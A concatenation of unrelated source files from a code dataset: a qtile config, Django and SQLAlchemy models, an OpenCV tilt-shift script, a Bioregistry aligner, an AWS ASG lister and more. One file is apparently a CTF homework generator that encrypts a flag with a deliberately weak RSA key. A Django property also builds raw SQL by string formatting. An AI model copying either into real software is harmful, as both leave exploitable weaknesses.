\\033[0m\")\n user_input = input(\"\\033[1m Saisie : \\033[0m\")\n \n elif int(user_input) == random_nbr:\n print(\"\\033[1m Félicitations vous avez gagné ! 
\\033[0m\") \n break\n \nif user_input == 'q':\n msg()\n\n\n\n \n \n\n\n\n\n \n\n \n\n\n\n\n\n ","sub_path":"scripts/1d-mol.py","file_name":"1d-mol.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"443443015","text":"from libqtile.config import Key, Screen, Group, Drag, Click\nfrom libqtile.command import lazy\nfrom libqtile import layout, bar, widget\n\nshift = \"shift\"\nctrl = \"control\"\nalt = \"mod1\"\nwin = \"mod4\"\nmod = \"mod4\"\n\nkeys = [\n\n\t# Qtile System Controls\n\tKey([ctrl, alt], \"Delete\", \n\t\tlazy.shutdown()),\n\tKey([ctrl, alt], \"r\",\n\t\tlazy.restart()),\n\n\t# Set window style\n\tKey([alt], \"s\",\n\t\tlazy.group.setlayout('stack')),\n\tKey([alt], \"d\",\n\t\tlazy.group.setlayout('max')),\n\tKey([alt], \"f\",\n\t\tlazy.window.toggle_fullscreen()),\n\n\t# Close window\n\tKey([alt], \"x\",\n\t\tlazy.window.kill()),\n\n\t# Switch between windows on the same stack\n\tKey([alt], \"h\",\n\t\tlazy.layout.previous()),\n\tKey([alt], \"l\",\n\t\tlazy.layout.next()),\n\tKey([alt], \"k\",\n\t\tlazy.layout.down()),\n\tKey([alt], \"j\",\n\t\tlazy.layout.up()),\n\n\t# Switch between windows on the same screen\n\tKey([alt], \"Left\",\n\t\tlazy.layout.previous()),\n\tKey([alt], \"Right\",\n\t\tlazy.layout.next()),\n\tKey([alt], \"Up\",\n\t\tlazy.layout.down()),\n\tKey([alt], \"Down\",\n\t\tlazy.layout.up()),\n\n\t# Move windows on the stack\n\tKey([alt, shift], \"h\",\n\t\tlazy.layout.client_to_previous()),\n\tKey([alt, shift], \"l\",\n\t\tlazy.layout.client_to_next()),\n\tKey([alt, shift], \"k\",\n\t\tlazy.layout.shuffle_down()),\n\tKey([alt, shift], \"j\",\n\t\tlazy.layout.shuffle_up()),\n\n\t# Move windows on the screen\n\tKey([alt, shift], \"Left\",\n\t\tlazy.layout.client_to_previous()),\n\tKey([alt, shift], \"Right\",\n\t\tlazy.layout.client_to_next()),\n\tKey([alt, shift], \"Up\",\n\t\tlazy.layout.shuffle_down()),\n\tKey([alt, shift], \"Down\",\n\t\tlazy.layout.shuffle_up()),\n\n\t# Split and flip windows on the screen\n\tKey([alt], \"space\",\n\t\tlazy.layout.toggle_split()),\n\tKey([alt, shift], \"space\",\n\t\tlazy.layout.rotate()),\n\n\t# Dmenu quick commands\n\tKey([alt, shift], \"Return\",\n\t\tlazy.spawncmd()),\n\tKey([alt], \"g\",\n\t\tlazy.switchgroup()),\n\n\t# Spawn app shortucts\n\tKey([alt], \"Return\",\n\t\tlazy.spawn(\"gnome-terminal\")),\n\tKey([alt], \"BackSpace\",\n\t\tlazy.spawn(\"urxvt256c\")),\n\tKey([alt, shift], \"d\",\n\t\tlazy.spawn(\"dwb\")),\n\tKey([alt, shift], \"f\",\n\t\tlazy.spawn(\"firefox\")),\n\tKey([alt, shift], \"g\",\n\t\tlazy.spawn(\"google-chrome-stable\")),\n\tKey([alt, shift], \"p\",\n\t\tlazy.spawn(\"gnome-control-center\")),\n\tKey([alt, shift], \"s\",\n\t\tlazy.spawn(\"spotify\")),\n\tKey([alt, shift], \"n\",\n\t\tlazy.spawn(\"nautilus\")),\n\t\n\t# Enable audio buttons\n Key([], \"XF86AudioRaiseVolume\",\n lazy.spawn(\"amixer -c 0 -q set Master 2dB+\")),\n Key([], \"XF86AudioLowerVolume\",\n lazy.spawn(\"amixer -c 0 -q set Master 2dB-\")),\n\n # Also allow changing volume the old fashioned way.\n Key([mod], \"equal\", lazy.spawn(\"amixer -c 0 -q set Master 2dB+\")),\n Key([mod], \"minus\", lazy.spawn(\"amixer -c 0 -q set Master 2dB-\")),\n\n]\n\ngroups = [Group(i) for i in \"1234567890\"]\n\nfor i in groups:\n\n keys.append(\n Key([alt], i.name, lazy.group[i.name].toscreen())\n )\n\n keys.append(\n Key([alt, \"shift\"], i.name, lazy.window.togroup(i.name))\n )\n\nlayouts = [\n layout.Stack(num_stacks=2),\n 
layout.Max()\n]\n\nwidget_defaults = dict(\n font='Arial',\n fontsize=16,\n padding=3,\n)\n\nscreens = [\n Screen(\n bottom=bar.Bar(\n [\n widget.GroupBox(active=\"#9393CC\",\n this_screen_border=\"#CC9393\",\n this_current_screen_border=\"#8DCBE2\"),\n widget.Sep(padding=10),\n widget.Prompt(),\n widget.WindowName(),\n widget.Sep(padding=10),\n widget.CPUGraph(graph_color=\"#9393CC\",\n fill_color=[\"#9393CC\", \"#001111\"]),\n widget.Sep(padding=10),\n widget.TextBox(text=\"Volume: \", foreground=\"#9393CC\"),\n widget.Volume(foreground=\"#9393CC\"),\n widget.Sep(padding=10),\n widget.TextBox(text=\"Battery: \", foreground=\"#8DCBE2\"),\n widget.Battery(format=\"{percent:2.0%} {char}\", discharge_char=\"~\", foreground=\"#8DCBE2\"),\n widget.TextBox(text=\"Est Time Rem: \", foreground=\"#8DCBE2\"),\n widget.Battery(format=\"{hour:d}:{min:02d}\", foreground=\"#8DCBE2\"),\n widget.Sep(padding=10),\n widget.Systray(),\n widget.Sep(padding=10),\n widget.Clock(format='%Y-%m-%d %a %I:%M %p', foreground=\"#9393CC\"),\n ],\n 30,\n ),\n ),\n]\n\n# Drag floating layouts.\nmouse = [\n Drag([alt], \"Button1\", lazy.window.set_position_floating(),\n start=lazy.window.get_position()),\n Drag([alt], \"Button3\", lazy.window.set_size_floating(),\n start=lazy.window.get_size()),\n Click([alt], \"Button2\", lazy.window.bring_to_front())\n]\n\ndgroups_key_binder = None\ndgroups_app_rules = []\nmain = None\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating()\nauto_fullscreen = True\nwmname = \"qtile\"\n","sub_path":"qtile/.config/qtile/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"19185251","text":"from sqlalchemy import Column, Integer, String, Text, ForeignKey, PickleType\n\nfrom sqlalchemy.orm import relationship\n\nfrom .database import Base, engine\n\nfrom flask.ext.login import UserMixin\n\nclass User(Base, UserMixin):\n __tablename__ = \"users\"\n \n id = Column(Integer, primary_key=True)\n name = Column(String(128))\n email = Column(String(128), unique=True)\n password = Column(String(128))\n character = relationship(\"Character\", backref=\"author\")\n\nclass Character(Base):\n __tablename__ = \"characters\"\n \n id = Column(Integer, primary_key=True)\n char_name = Column(String(1024))\n char_race = Column(String(128))\n char_class = Column(String(128))\n stats = Column(PickleType)\n skills = Column(PickleType)\n feats = Column(PickleType)\n features = Column(PickleType)\n traits = Column(PickleType)\n inventory = Column(PickleType)\n author_id = Column(Integer, ForeignKey('users.id'))\n \n \nBase.metadata.create_all(engine)","sub_path":"character_builder/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"472760214","text":"import cv2\nimport numpy as np\nfrom copy import copy\n\nvideo_r = cv2.VideoCapture(\"traffic.mp4\")\nfourcc = cv2.VideoWriter_fourcc(*'MJPG')\nvideo_w = cv2.VideoWriter(\"traffic_tilt.avi\",fourcc , video_r.get(cv2.CAP_PROP_FPS), (int(video_r.get(cv2.CAP_PROP_FRAME_WIDTH)),int(video_r.get(cv2.CAP_PROP_FRAME_HEIGHT))),True)\n\nl1 = 400\nl2 = 600\nd = 20\nm = 0\n\n\ndef alpha(x, l1, l2, d):\n return (0.5 * (np.tanh((x-l1)/(d+0.0001)) - np.tanh((x-l2)/(d+0.0001))))\n\ndef tilt_filter():\n global height, width, l1, l2, d\n array = np.ones([height,width])\n for y in 
range(height):\n array[y,:] *= alpha(y, l1, l2, d)\n return np.array(array,dtype=np.float32)\n\ndef applyTilt(image, image_2):\n global height, width, l1, l2, d, result\n filtro = tilt_filter()\n\n filtro_negativo = np.ones([height, width], dtype=np.float32) - filtro\n for i in range(depth):\n result[:,:,i] = cv2.multiply(filtro,image[:,:,i])\n result[:,:,i] += cv2.multiply(filtro_negativo,image_2[:,:,i])\n\nwhile True:\n ret, frame = video_r.read()\n if not ret:\n break\n ret, frame = video_r.read()\n if not ret:\n break\n ret, frame = video_r.read()\n if not ret:\n break\n if not ret:\n break\n ret, frame = video_r.read()\n if not ret:\n break\n\n\n\n height, width, depth = frame.shape\n result = np.zeros([height,width,depth])\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV).astype(\"float32\")\n (h, s, v) = cv2.split(frame)\n s = s * 1.5\n s = np.clip(s, 0, 255)\n frame = cv2.merge([h, s, v])\n frame = cv2.cvtColor(frame.astype(\"uint8\"), cv2.COLOR_HSV2BGR)\n frame = np.array(frame, dtype=np.float32)\n\n media = np.ones([3, 3], dtype=np.float32)\n mask = cv2.scaleAdd(media, 1 / 9.0, np.zeros([3, 3], dtype=np.float32))\n frame_blur = copy(frame)\n for i in range(10):\n frame_blur = cv2.filter2D(frame_blur, -1, mask, anchor=(1, 1))\n\n applyTilt(frame, frame_blur)\n\n result = np.array(result,dtype=np.uint8)\n # cv2.waitKey(2)\n\n # cv2.imshow(\"hola\", result)\n\n video_w.write(result)\n\nvideo_r.release()\nvideo_w.release()\ncv2.destroyAllWindows()\n\n\n\n","sub_path":"trab1/tiltshift_video.py","file_name":"tiltshift_video.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"439395377","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Align the OBO Foundry with the Bioregistry.\"\"\"\n\nimport requests\nimport requests.exceptions\nimport requests_ftp\n\nfrom ..external import get_obofoundry\nfrom ..utils import norm, secho, updater\n\nrequests_ftp.monkeypatch_session()\nsession = requests.Session()\n\nOBO_KEYS = {\n 'id',\n 'prefix',\n 'pattern',\n 'namespaceEmbeddedInLui',\n 'name',\n 'deprecated',\n 'description',\n 'homepage',\n}\n\n\ndef _prepare_obo(obofoundry_entry): # noqa:C901\n prefix = obofoundry_entry['id']\n rv = {\n 'prefix': prefix,\n 'name': obofoundry_entry['title'],\n 'deprecated': obofoundry_entry.get('is_obsolete', False),\n }\n\n license_dict = obofoundry_entry.get('license')\n if license_dict is not None:\n rv['license'] = license_dict['label']\n\n homepage = obofoundry_entry.get('homepage')\n if homepage is not None:\n rv['homepage'] = homepage\n\n contact_dict = obofoundry_entry.get('contact')\n if contact_dict is not None and contact_dict.get('email'):\n rv.update({\n 'contact': contact_dict['email'],\n 'contact.label': contact_dict['label'],\n })\n\n build = obofoundry_entry.get('build')\n if build is not None:\n method = build.get('method')\n if method is None and 'checkout in build':\n method = 'vcs'\n if method is None:\n secho(f'[{prefix}] missing method: {build}', fg='red')\n return rv\n\n if method == 'vcs':\n if 'system' not in build:\n secho(f'[{prefix}] missing build system', fg='red')\n return rv\n if build['system'] != 'git':\n secho(f'[{prefix}] unrecognized build system: {build[\"system\"]}', fg='red')\n return rv\n checkout = build['checkout'].replace(' ', ' ')\n if not checkout.startswith('git clone https://github.com/'):\n secho(f'[{prefix}] unhandled build checkout: {checkout}', fg='red')\n return rv\n\n owner, repo = checkout.removeprefix('git clone 
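Aside: a numeric sanity check of the tanh window alpha() used by the tilt-shift filter above; it sits near 1 inside the [l1, l2] band (kept sharp) and decays toward 0 outside (blended with the blurred copy). The band and falloff values are illustrative.

    import numpy as np

    def alpha(x, l1, l2, d):
        return 0.5 * (np.tanh((x - l1) / (d + 0.0001)) - np.tanh((x - l2) / (d + 0.0001)))

    assert alpha(500, 400, 600, 20) > 0.99   # inside the band: fully sharp
    assert alpha(0, 400, 600, 20) < 0.01     # far outside: fully blurred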
https://github.com/').removesuffix('.git').split('/')\n rv['repo'] = f'https://github.com/{owner}/{repo}.git'\n\n path = build.get('path', '.')\n if path == '.':\n obo_url = f'https://raw.githubusercontent.com/{owner}/{repo}/master/{prefix}.obo'\n else: # disregard the path since most repos don't actually use it anyway\n # TODO maybe try recovering if this doesn't work\n obo_url = f'https://raw.githubusercontent.com/{owner}/{repo}/master/{prefix}.obo'\n\n res = session.get(obo_url)\n if res.status_code == 200:\n rv['download.obo'] = obo_url\n else:\n secho(f\"[{prefix}] [http {res.status_code}] see {rv['repo']} [{path}]\", bold=True, fg='red')\n\n elif method == 'owl2obo':\n source_url = build['source_url']\n\n # parse repo if possible\n for url_prefix in ('https://github.com/', 'http://github.com/', 'https://raw.githubusercontent.com/'):\n if source_url.startswith(url_prefix):\n owner, repo, *_ = source_url.removeprefix(url_prefix).split('/')\n rv['repo'] = f'https://github.com/{owner}/{repo}.git'\n break\n\n if source_url.endswith('.obo'):\n rv['download.obo'] = source_url\n elif source_url.endswith('.owl'):\n obo_url = source_url.removesuffix('.owl') + '.obo'\n res = session.get(obo_url)\n if res.status_code == 200:\n rv['download.obo'] = source_url\n else:\n secho(f'[{prefix}] [http {res.status_code}] problem with {obo_url}', bold=True, fg='red')\n else:\n secho(f'[{prefix}] unhandled build.source_url: {source_url}', fg='red')\n\n elif method == 'obo2owl':\n source_url = build['source_url']\n if source_url.endswith('.obo'):\n res = session.get(source_url)\n if res.status_code == 200:\n rv['download.obo'] = source_url\n else:\n secho(f'[{prefix}] [http {res.status_code}] problem with {source_url}', bold=True, fg='red')\n else:\n secho(f'[{prefix}] unhandled extension {source_url}', bold=True, fg='red')\n else:\n secho(f'[{prefix}] unhandled build method: {method}', fg='red')\n\n return rv\n\n\n@updater\ndef align_obofoundry(registry):\n \"\"\"Update OBOFoundry references.\"\"\"\n obofoundry_id_to_bioregistry_id = {\n entry['obofoundry']['prefix']: key\n for key, entry in registry.items()\n if 'obofoundry' in entry\n }\n obofoundry_registry = get_obofoundry(mappify=True)\n\n obofoundry_norm_prefix_to_prefix = {\n norm(obo_key): obo_key\n for obo_key in obofoundry_registry\n }\n for bioregistry_id, entry in registry.items():\n if 'obofoundry' in entry:\n continue\n obofoundry_id = obofoundry_norm_prefix_to_prefix.get(norm(bioregistry_id))\n if obofoundry_id is not None:\n entry['obofoundry'] = {'prefix': obofoundry_id}\n obofoundry_id_to_bioregistry_id[obofoundry_id] = bioregistry_id\n\n for obofoundry_prefix, obofoundry_entry in obofoundry_registry.items():\n # Get key by checking the miriam.id key\n bioregistry_id = obofoundry_id_to_bioregistry_id.get(obofoundry_prefix)\n if bioregistry_id is None:\n if obofoundry_entry.get('is_obsolete'):\n secho(f'[{obofoundry_prefix}] skipping deprecated. 
If needed, add manually later', fg='yellow')\n continue\n\n bioregistry_id = obofoundry_prefix\n registry[bioregistry_id] = {}\n secho(f'[{obofoundry_prefix}] added: {obofoundry_entry[\"title\"]}', fg='green')\n\n try:\n registry[bioregistry_id]['obofoundry'] = _prepare_obo(obofoundry_entry)\n except requests.exceptions.ConnectionError as e:\n secho(f'[{bioregistry_id}] failed to get data: {e}', fg='red')\n continue\n\n return registry\n\n\nif __name__ == '__main__':\n align_obofoundry()\n","sub_path":"src/bioregistry/align/obofoundry.py","file_name":"obofoundry.py","file_ext":"py","file_size_in_byte":6262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"536360356","text":"#!/usr/bin/env python3\nimport json\nfrom Crypto.Util.number import *\nfrom gmpy2 import next_prime\nfrom random import randint\n\nflag = open('flag', 'rb').read()\n\ndef genkey():\n while True:\n while True:\n p = 2\n while size(p) < 512:\n p *= getPrime(randint(2, 12))\n if isPrime(p + 1):\n p = p + 1\n break\n r = randint(100, 2 ** 512)\n q1, q2 = int(next_prime(r)), int(next_prime(3 * next_prime(r)))\n n, phi = p * q1 * q2, (p - 1) * (q1 - 1) * (q2 - 1)\n e = 4 * randint(10, 100)\n if GCD(e, phi) == 4:\n return (p, q1, q2, n, e)\n\np, q1, q2, n, e = genkey()\nm = bytes_to_long(flag)\nc = pow(m, e, n)\n\nprint(json.dumps((n, e, c)))\n","sub_path":"homeworks/hw0x0a/Can_You_Decrypt/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"230462281","text":"import os\nimport numpy as np\nfrom IPython import get_ipython\n\nimport matplotlib.pyplot as plt\n\n\ndef isnotebook():\n try:\n shell = get_ipython().__class__.__name__\n if shell == 'ZMQInteractiveShell': # Jupyter notebook or qtconsole?\n return True\n elif shell == 'TerminalInteractiveShell': # Terminal running IPython?\n return False\n else:\n return False # Other type (?)\n except NameError:\n return False # Probably standard Python interpreter\n\n\ndef plot_network_output(real_A, fake_B, real_B, fake_A, iteration):\n dirToSave = \"testResults/\"\n if not os.path.exists(dirToSave):\n os.makedirs(dirToSave)\n filePathName = dirToSave + \"test_\"\n fig, ax = plt.subplots(nrows=2, ncols=2, figsize=(18, 6))\n ax[(0, 0)].imshow(create_image(np.squeeze(real_A[0])), interpolation='nearest')\n ax[(0, 1)].imshow(create_image(np.squeeze(fake_B[0])), interpolation='nearest')\n ax[(0, 0)].axis('off')\n ax[(0, 1)].axis('off')\n ax[(1, 0)].imshow(create_image(np.squeeze(real_B[0])), cmap=plt.cm.gray, interpolation='nearest')\n ax[(1, 1)].imshow(create_image(np.squeeze(fake_A[0])), cmap=plt.cm.gray, interpolation='nearest')\n\n ax[(1, 0)].axis('off')\n ax[(1, 1)].axis('off')\n fig.suptitle('Input | Generated ')\n if (isnotebook()):\n plt.show()\n else:\n path = ''.join([filePathName, \"_\", str(iteration).zfill(4), '.png'])\n print(\"Saving network output 1 to {0}\".format(path))\n fig.savefig(path, dpi=100)\n\ndef create_image(im):\n # scale the pixel values from [-1,1] to [0,1]\n return (im + 1) / 2\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"431522791","text":"n, m = map(int, input().split())\nhappy = list(map(lambda x: int(x) + 1, input().split()))\n\ndef get_square_sum(x):\n nums = [i ** 2 for i in range(1, x+1)]\n return sum(nums)\n\ntotal = 
0\nunhappy_days = m - sum(happy)\n\nif unhappy_days <= 0:\n    print(total)\nelse:\n    # spread the unhappy days evenly across the n+1 slots\n    # 10 to 3\n    depress_list = [0 for _ in range(n + 1)]\n    for i in range(unhappy_days):\n        depress_list[i % (n + 1)] += 1\n    print(sum(list(map(lambda x: get_square_sum(x), depress_list))))\n\n# 3 10\n# 1 1 1\n# 4 to 3\n# {-1} 1 0 {-1} 1 0 {-1} 1 0 {-1}\n","sub_path":"python/17392.py","file_name":"17392.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"502434375","text":"#!/usr/bin/env python\n\n#\n# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You may not use this file\n# except in compliance with the License. A copy of the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is distributed on an \"AS IS\"\n# BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations under the License.\n#\n\nimport sys\nimport boto3\nimport argparse\nfrom awscfnctl import CfnControl\n\nprogname = 'get_inst_from_asg'\n\ndef arg_parse():\n\n    parser = argparse.ArgumentParser(prog=progname, description='List instances in an ASG')\n\n    opt_group = parser.add_argument_group()\n    opt_group.add_argument('-r', dest='region', required=False, help=\"Region name\")\n\n    req_group = parser.add_argument_group('required arguments')\n    req_group.add_argument('-a', dest='asg_name', required=True)\n\n    return parser.parse_args()\n\n\ndef main():\n\n    rc = 0\n\n    args = arg_parse()\n\n    region = args.region\n    asg = args.asg_name\n\n    cfn_client = CfnControl(region=region)\n\n    instances = cfn_client.get_inst_from_asg(asg)\n\n    for i in instances:\n        print(' {}'.format(i))\n\n    asg_status = cfn_client.ck_asg_inst_status(asg)\n\n    return rc\n\nif __name__ == \"__main__\":\n    try:\n        sys.exit(main())\n    except KeyboardInterrupt:\n        print('\\nReceived Keyboard interrupt.')\n        print('Exiting...')\n\n","sub_path":"aws-cfn-control/awscfnctl/get_inst_from_asg.py","file_name":"get_inst_from_asg.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"417421330","text":"import logging\nfrom datetime import datetime, date\n\nfrom django.contrib.auth.models import User as Manager\nfrom django.contrib.postgres.fields import JSONField\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import validate_email\nfrom django.db import models, connections, transaction\nfrom django.db.models import Q\nfrom django.utils import timezone\nfrom django.utils.functional import cached_property\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom aster.models import Cdr\nfrom utils.models import dictfetchall, dict_diff\n\nlogger = logging.getLogger(__name__)\n\n\ndef distill(obj):\n    new_obj = dict()\n    for key, value in obj.items():\n        if key.startswith('_') or isinstance(value, models.Model):\n            continue\n        elif isinstance(value, (datetime, date)):\n            new_obj[key] = value.isoformat()\n        else:\n            new_obj[key] = value\n    return new_obj\n\n\nclass UserManager(models.Manager):\n    def create_user(self, *agrs, **kwargs):\n        with transaction.atomic():\n            manager = kwargs.pop('act_manager')\n            comment = kwargs.pop('act_comment', '')\n            user = self.model(**kwargs)\n            
user.save(force_insert=True)\n UserHistory.objects.create(manager_id=manager.id,\n user_id=user.id,\n act=1,\n comment=comment,\n new=distill(user.__dict__))\n return user\n\n def update_user(self, user, *agrs, **kwargs):\n with transaction.atomic():\n manager = kwargs.pop('act_manager')\n comment = kwargs.pop('act_comment', '')\n for attr, value in kwargs.items():\n setattr(user, attr, value)\n old, new = dict_diff(distill(user._loaded_values), distill(user.__dict__))\n if len(old) > 0 or len(new) > 0:\n user.save(force_update=True)\n UserHistory.objects.create(manager_id=manager.id,\n user_id=user.id,\n act=2,\n comment=comment,\n old=old,\n new=new)\n return user\n\n\nclass User(models.Model):\n SEX_OPT = (\n (1, 'М'),\n (2, 'Ж'),\n )\n JOB_OPT = (\n (1, 'ген.директор'),\n (2, 'директор'),\n (3, 'гл.бухгалтер'),\n (4, 'бухгалтер'),\n (5, 'секретарь'),\n (6, 'другое'),\n )\n uid = models.IntegerField(blank=True, null=True, help_text='uid из LanBilling для физ. лиц')\n company_uid = models.IntegerField(blank=True, null=True, help_text='uid из LanBilling для юр. лиц')\n group = models.ForeignKey('UserGroup', models.DO_NOTHING, blank=True, null=True)\n vip = models.BooleanField(default=False)\n sex = models.IntegerField(_('sex'), choices=SEX_OPT, blank=True, null=True, help_text='пол')\n birthday = models.DateField(blank=True, null=True, help_text='день рождения')\n company = models.CharField(max_length=255, blank=True, null=True, help_text='организация')\n job = models.IntegerField(choices=JOB_OPT, blank=True, null=True, help_text='должность')\n fullname = models.CharField(_('fullname'), max_length=255)\n surname = models.CharField(_('surname'), max_length=255, blank=True, null=True)\n name = models.CharField(_('name'), max_length=255, blank=True, null=True)\n patronymic = models.CharField(_('patronymic'), max_length=255, blank=True, null=True)\n comment = models.TextField(blank=True, null=True, help_text='комментарий')\n archive = models.BooleanField(default=False, help_text='запись удалена(флаг)')\n added = models.DateTimeField(auto_now_add=True, help_text='время добаления записи')\n updated = models.DateTimeField(auto_now=True, help_text='время изменения записи')\n manager = models.ForeignKey(Manager, models.DO_NOTHING, blank=True, null=True, help_text='ответственный менеджер')\n objects = UserManager()\n\n class Meta:\n db_table = 'addrbook_user'\n\n def __str__(self):\n return self.fullname\n\n @classmethod\n def from_db(cls, db, field_names, values):\n instance = super().from_db(db, field_names, values)\n instance._loaded_values = dict(zip(field_names, values))\n return instance\n\n @cached_property\n def contacts(self):\n \"\"\"\n Возвращает кортеж: список телефонов, список email-ов\n \"\"\"\n now = timezone.now()\n phones = []\n emails = []\n cl = list(self.contact_set\n .filter(timefrom__lte=now, timeto__isnull=True)\n .order_by('-primary', '-added'))\n for c in cl:\n if c.contact_type == 1:\n phones.append(c)\n else:\n emails.append(c)\n return phones, emails\n\n @cached_property\n def primary_phone(self):\n phones = self.contacts[0]\n if phones:\n return phones[0]\n\n @cached_property\n def primary_email(self):\n emails = self.contacts[1]\n if emails:\n return emails[0]\n\n def contacts_on_date(self, dt=None):\n if dt is None:\n return self.contacts\n if timezone.is_naive(dt):\n dt = timezone.make_aware(dt)\n return self.contact_set.filter(Q(timefrom__lte=dt, timeto__isnull=True) | Q(timefrom__lte=dt, timeto__gte=dt))\n\n @cached_property\n def recent_calls(self):\n phones = 
[x.part_1 for x in self.contacts[0]]\n if phones:\n # like = ['c.src LIKE \"%{0}\" or c.dst LIKE \"%{0}\"'.format(x) for x in phones]\n like = ['c.dst LIKE \"%{0}\"'.format(x) for x in phones]\n query = \"\"\"\n SELECT c.id, c.calldate, c.src, c.dst, c.did, c.duration, c.disposition, c.recordingfile\n FROM cdr c\n WHERE {0}\n ORDER BY c.id DESC\n \"\"\".format(' OR '.join(like))\n cursor = connections['asterisk'].cursor()\n cursor.execute(query)\n query_result = dictfetchall(cursor)\n cursor.close()\n return query_result[:5]\n\n @property\n def last_call(self):\n if self.recent_calls:\n return self.recent_calls[0]\n\n\nclass UserGroup(models.Model):\n name = models.CharField(max_length=255)\n descr = models.TextField(blank=True, null=True)\n\n class Meta:\n db_table = 'addrbook_user_group'\n\n def __str__(self):\n return self.name\n\n\nclass ContactManager(models.Manager):\n def create_contact(self, *agrs, **kwargs):\n with transaction.atomic():\n manager = kwargs.pop('act_manager')\n comment = kwargs.pop('act_comment', '')\n contact = self.model(**kwargs)\n if kwargs.get('primary', False):\n contact.unset_primary_from_other()\n contact.save(force_insert=True)\n ContactHistory.objects.create(manager_id=manager.id,\n contact_id=contact.id,\n act=1,\n comment=comment,\n new=distill(contact.__dict__))\n return contact\n\n def update_contact(self, contact, *agrs, **kwargs):\n with transaction.atomic():\n manager = kwargs.pop('act_manager')\n comment = kwargs.pop('act_comment', '')\n for attr, value in kwargs.items():\n setattr(contact, attr, value)\n if kwargs.get('primary', False):\n contact.unset_primary_from_other()\n old, new = dict_diff(distill(contact._loaded_values), distill(contact.__dict__))\n if len(old) > 0 or len(new) > 0:\n contact.save(force_update=True)\n ContactHistory.objects.create(manager_id=manager.id,\n contact_id=contact.id,\n act=2,\n comment=comment,\n old=old,\n new=new)\n return contact\n\n\nclass Contact(models.Model):\n TYPE_OPT = (\n (1, _('phone')),\n (2, _('email')),\n (3, _('sip')),\n (3, _('website')),\n )\n contact_type = models.IntegerField(choices=TYPE_OPT, default=1)\n contact_label = models.ForeignKey('ContactLabel', models.DO_NOTHING)\n user = models.ForeignKey('User', models.CASCADE)\n primary = models.BooleanField(default=False, help_text='основной контакт (флаг)')\n dirty = models.BooleanField(default=False)\n part_1 = models.CharField(max_length=255)\n part_2 = models.CharField(max_length=255, blank=True, null=True)\n timefrom = models.DateTimeField(default=timezone.now)\n timeto = models.DateTimeField(blank=True, null=True)\n comment = models.TextField(blank=True, null=True)\n added = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n objects = ContactManager()\n\n class Meta:\n db_table = 'addrbook_contact'\n\n def __str__(self):\n n = self.part_1\n if self.part_2:\n n += ' доб.{0}'.format(self.part_2)\n return n\n\n @classmethod\n def from_db(cls, db, field_names, values):\n instance = super().from_db(db, field_names, values)\n instance._loaded_values = dict(zip(field_names, values))\n return instance\n\n def clean(self):\n if self.contact_type == 1:\n if not self.part_1.isnumeric():\n raise ValidationError('Enter a valid phone number.', code='invalid')\n elif self.contact_type == 2:\n validate_email(self.part_1)\n\n def unset_primary_from_other(self):\n (Contact.objects\n .filter(contact_type=self.contact_type, user_id=self.user_id)\n .exclude(id=self.id)\n .update(primary=False))\n # def save(self, *args, 
**kwargs):\n    #     if self._state.adding:\n    #         pass\n    #     else:\n    #         pass\n    #     super().save(*args, **kwargs)\n\n\nclass ContactHistory(models.Model):\n    ACT_OPT = (\n        (1, 'добавление'),\n        (2, 'изменение'),\n    )\n    manager = models.ForeignKey(Manager, models.DO_NOTHING)\n    contact = models.ForeignKey('Contact', models.DO_NOTHING)\n    act = models.IntegerField(choices=ACT_OPT)\n    dt = models.DateTimeField(auto_now_add=True)\n    comment = models.TextField(blank=True, null=True)\n    old = JSONField(default=dict)\n    new = JSONField(default=dict)\n\n    class Meta:\n        db_table = 'addrbook_contact_history'\n\n    def __str__(self):\n        return '{0} {1}'.format(self.dt, self.comment)\n\n\nclass UserHistory(models.Model):\n    ACT_OPT = (\n        (1, 'добавление'),\n        (2, 'изменение'),\n    )\n    manager = models.ForeignKey(Manager, models.DO_NOTHING)\n    user = models.ForeignKey('User', models.DO_NOTHING)\n    act = models.IntegerField(choices=ACT_OPT)\n    dt = models.DateTimeField(auto_now_add=True)\n    comment = models.TextField(blank=True, null=True)\n    old = JSONField(default=dict)\n    new = JSONField(default=dict)\n\n    class Meta:\n        db_table = 'addrbook_user_history'\n\n    def __str__(self):\n        return '{0} {1}'.format(self.dt, self.comment)\n\n\nclass ContactLabel(models.Model):\n    name = models.CharField(max_length=255)\n    name_short = models.CharField(max_length=10)\n\n    class Meta:\n        db_table = 'addrbook_contact_label'\n\n    def __str__(self):\n        return 